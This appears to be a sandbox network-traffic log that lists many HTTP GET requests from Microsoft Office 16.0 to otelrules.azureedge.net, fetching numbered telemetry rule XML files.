Source: global trafficHTTP traffic detected: GET /rules/rule120659v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120660v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120662v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120661v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120663v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120666v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120665v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120667v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120668v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120664v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120669v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120670v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120673v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120672v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120671v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120677v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120674v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120676v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120675v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120678v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120682v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120679v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120681v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120680v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120602v10s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120601v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule224901v11s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700401v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700400v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703901v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703351v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703350v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703501v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703500v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703401v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703400v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703601v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703600v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703850v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703851v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703801v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703800v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703700v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703701v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703750v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703751v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule704051v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule704050v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
